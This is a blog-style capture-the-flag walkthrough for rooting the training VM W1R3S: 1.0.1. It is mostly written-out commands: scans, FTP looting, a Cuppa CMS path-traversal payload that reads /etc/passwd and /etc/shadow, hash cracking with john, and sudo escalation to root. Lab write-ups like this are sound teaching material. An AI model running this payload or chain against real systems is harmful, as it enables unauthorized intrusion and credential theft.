Sign in Subscribe

[Vulnhub] Rooting VulnHub W1R3S: 1.0.1 — A Complete, Step-by-Step Walkthrough

Last updated on 
This post is a clean, reproducible lab guide to compromise the vulnerable VM W1R3S: 1.0.1 end-to-end: discovery → enumeration → exploitation (LFI) → password cracking → SSH foothold → privilege escalation → proof. It’s written for beginners, but efficient enough for a speed-runner.

Table of Contents

  1. What you’ll learn
  2. Lab setup & prerequisites
  3. Network discovery
  4. Port scanning & service fingerprinting
  5. Looting FTP (anonymous)
  6. Web enumeration (finding hidden areas)
  7. Exploiting Cuppa CMS LFI to read files
  8. Extracting /etc/shadow & cracking a user
  9. SSH foothold with cracked creds
  10. Privilege escalation to root (sudo)
  11. Alternative paths & rabbit holes (WordPress)
  12. Troubleshooting & FAQ
  13. Speed-run checklist
  14. Ethics & safe practice
  15. Appendix: Handy one-liners

1) What You’ll Learn

  • A practical workflow for host discovery and service enumeration
  • How to mirror an FTP share and triage clue files quickly
  • How to identify and exploit a Local File Inclusion (LFI) in Cuppa CMS
  • How to retrieve /etc/passwd and /etc/shadow via LFI and crack hashes
  • How to verify sudoers and escalate privileges cleanly
  • What to ignore and why (avoiding rabbit holes speeds you up)

2) Lab Setup & Prerequisites

  • Attacker box: Kali Linux (or any Linux with nmap, curl, john, ffuf, wget)
  • Target: VulnHub VM W1R3S: 1.0.1 (bridged or NAT networking with DHCP)
  • Same L2 segment or appropriate routing so the attacker can reach the VM
  • Wordlists: rockyou.txt (commonly at /usr/share/wordlists/rockyou.txt)
⚠️ Legal note: Only attack machines you own or have explicit permission to test. This VM is purposefully vulnerable for training.

3) Network Discovery

Identify the target’s IP on your subnet.

# Option A: ARP sweep (quick on LANs)
sudo arp-scan -l

# Option B: netdiscover (passive/ARP)
sudo netdiscover -r 10.0.0.0/24

# Option C: ping sweep (ICMP may be filtered)
for i in {1..254}; do ping -c1 -W1 10.0.0.$i | grep "1 received" & done

Assume we find the host at 10.0.0.42. I’ll use $IP as a placeholder:

export IP=10.0.0.42

4) Port Scanning & Service Fingerprinting

Start broad, then deep.

# Fast top-ports scan
nmap -T4 --top-ports 1000 -sV -oN nmap_top.txt $IP

# Full TCP sweep with scripts & version detection
sudo nmap -p- -sV -sC -O -oN nmap_full.txt $IP

Typical result (representative):

  • 21/tcp — FTP (vsftpd 3.0.3), anonymous login allowed
  • 22/tcp — SSH (OpenSSH 7.x)
  • 80/tcp — HTTP (Apache/2.4.x)
  • 3306/tcp — MySQL (host ACL restricts remote access)

5) Looting FTP (Anonymous)

If anonymous login is allowed, mirror everything for offline triage:

# Recursive mirror (no passive mode avoids some flaky setups; toggle if needed)
wget -m --no-passive ftp://anonymous:@$IP/
# Files will land under $IP/ in your current directory
tree $IP

What to look for:

  • Small text files under directories like content/, docs/, new-employees/
  • You may see base64 strings, MD5 digests, or employee names.
  • Treat them as breadcrumbs (usernames, small hints). Don’t overfit: they are not strictly required to root the box.

6) Web Enumeration (Finding Hidden Areas)

Run a wordlist dir-bust to discover interesting paths.

ffuf -u http://$IP/FUZZ -w /usr/share/dirb/wordlists/big.txt -ic -t 50 -o ffuf-root.json
ffuf -u http://$IP/administrator/FUZZ -w /usr/share/dirb/wordlists/common.txt -ic -t 50 -o ffuf-admin.json

Common findings:

  • /administrator → Cuppa CMS bits (installer/alerts)
  • /wordpress → a misconfigured WordPress (not needed for the intended path)

We’ll focus on Cuppa CMS because it exposes an LFI.

7) Exploiting Cuppa CMS LFI to Read Files

Cuppa’s alerting component uses a parameter that it concatenates into a file include path.

Test LFI to read /etc/passwd:

curl -s -X POST \
  -d "field=x&urlConfig=../../../../../../../../../../../../etc/passwd" \
  http://$IP/administrator/alerts | sed -n '1,80p'

If successful, you’ll see system users. This confirms a Local File Inclusion.

Tip: Some builds respond better to POST than GET for this endpoint. Keep the traversal long to be safe (it’s harmless to over-traverse).

8) Extracting /etc/shadow & Cracking a User

Now pull /etc/shadow. On many boxes this is readable due to the vulnerable include.

curl -s -X POST \
  -d "field=x&urlConfig=../../../../../../../../../../../../etc/shadow" \
  http://$IP/administrator/alerts > shadow.txt

You should now have a file with entries like:

w1r3s:$6$SALT$HASH:...

Prepare for cracking with john:

# If needed, combine with /etc/passwd for matching users
curl -s -X POST \
  -d "field=x&urlConfig=../../../../../../../../../../../../etc/passwd" \
  http://$IP/administrator/alerts > passwd.txt

# (Optional) unshadow step if john complains; not always necessary
unshadow passwd.txt shadow.txt > unshadowed.txt

# Crack with rockyou (ensure it’s unzipped)
# Try both files; john handles either hash-only (shadow) or unshadowed format.
john --wordlist=/usr/share/wordlists/rockyou.txt shadow.txt
# or
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

# Show cracked credentials
john --show shadow.txt

Expected: You’ll recover a password for a local user (commonly the user w1r3s). Keep the username:password pair for SSH.

If cracking stalls: enable rules (--rules), try --fork=4, or run a short mask attack if you have a hunch about complexity. For this VM, a basic wordlist is enough.

9) SSH Foothold with Cracked Creds

Log in via SSH using the cracked credentials:

ssh w1r3s@$IP
# password: <the one john recovered>

Post-login checks:

id
whoami
hostname
ls -la ~

10) Privilege Escalation to Root (sudo)

Always enumerate sudo first:

sudo -l

On this VM, you’ll typically see something equivalent to:

User w1r3s may run the following commands on <host>:
    (ALL : ALL) ALL

That means full sudo. Pop a root shell:

sudo -s
# or
sudo su -

Proof:

id
whoami    # root
cat /root/flag.txt

Done. 🎯

11) Alternative Paths & Rabbit Holes (WordPress)

You may find a WordPress at /wordpress, but it’s partially misconfigured (e.g., base URL pointing to localhost). You could try to:

  • Fix rendering with a Burp response rule or a local /etc/hosts alias to map the expected hostname to $IP
  • Run wpscan to enumerate users/plugins/themes
  • Attempt a template upload shell if you find creds

…but none of this is necessary for the intended solution. It’s a useful enumeration exercise only.

12) Troubleshooting & FAQ

Q: LFI against /administrator/alerts returns errors or blank pages.

  • Use POST with the exact parameter urlConfig=... and include a dummy field= key.
  • Try a longer traversal (many ../).
  • Verify the path: http://$IP/administrator/alerts (no trailing slash needed).
  • Confirm the webroot is reachable (curl -I http://$IP/).

Q: john doesn’t crack the hash.

  • Ensure you captured a full hash line (no HTML truncation).
  • Try unshadow passwd.txt shadow.txt > unshadowed.txt and crack unshadowed.txt.
  • Double-check rockyou.txt is present and unzipped (/usr/share/wordlists/rockyou.txt).
  • Add --rules or try a different wordlist (e.g., SecLists/Passwords/Common-Credentials).

Q: I can’t SSH (connection refused).

  • Verify port 22 is open with nmap -p22 $IP.
  • If using VirtualBox/VMware, re-check networking mode (bridged/NAT) and that the guest got an IP.
  • If NAT, ensure port forwarding or switch to bridged for simplicity.

Q: sudo -l asks for a password and then denies.

  • Make sure you’re running sudo -l as the cracked user.
  • If sudoers is not permissive in your run, enumerate standard Linux privesc paths (SUID binaries, writable cron, PATH hijack, kernel exploits). On the stock VM, sudo is the intended path.

13) Speed-Run Checklist

  1. Find IP: netdiscover -r X.X.X.0/24
  2. Scan: nmap -p- -sV -sC $IP
  3. Mirror FTP: wget -m --no-passive ftp://anonymous:@$IP/ (skim clues)
  4. Dirbust: ffuf -u http://$IP/FUZZ -w ... → see /administrator
  5. LFI: POST to /administrator/alerts → read /etc/passwd, /etc/shadow
  6. Crack: john --wordlist=rockyou.txt shadow.txt
  7. SSH: ssh user@$IP (use cracked pass)
  8. Root: sudo -lsudo -scat /root/flag.txt

14) Ethics & Safe Practice

  • Use this VM for education only.
  • Don’t reuse cracked credentials on real systems.
  • Keep notes and command histories; reproducibility is a core skill in professional pentesting.

15) Appendix: Handy One-Liners

HTTP titles of discovered paths

while read p; do
  code=$(curl -s -o /dev/null -w "%{http_code}" http://$IP/$p)
  [ "$code" != "404" ] && printf "%-30s %s\n" "$p" "$code" && \
    curl -s http://$IP/$p | grep -i -m1 -E "<title>|<h1" | sed 's/<[^>]*>//g'
done < /usr/share/dirb/wordlists/common.txt

HTML-safe LFI dump (strip tags just in case)

curl -s -X POST \
  -d "field=x&urlConfig=../../../../../../../../../../../../etc/passwd" \
  http://$IP/administrator/alerts | sed 's/<[^>]*>//g'

John quick performance sanity check

john --test

Archive your run (evidence pack)

mkdir -p evidence && cp nmap_*.txt ffuf-*.json passwd.txt shadow.txt evidence/
tar -czf wires101_evidence.tgz evidence

Final Words

This VM is perfect for practicing the core rhythm of CTF-style pentesting: enumerate broadly, pick the shortest viable path, and keep your pipeline tidy (notes, captures, artifacts). Once you internalize this flow, you’ll move faster on tougher boxes.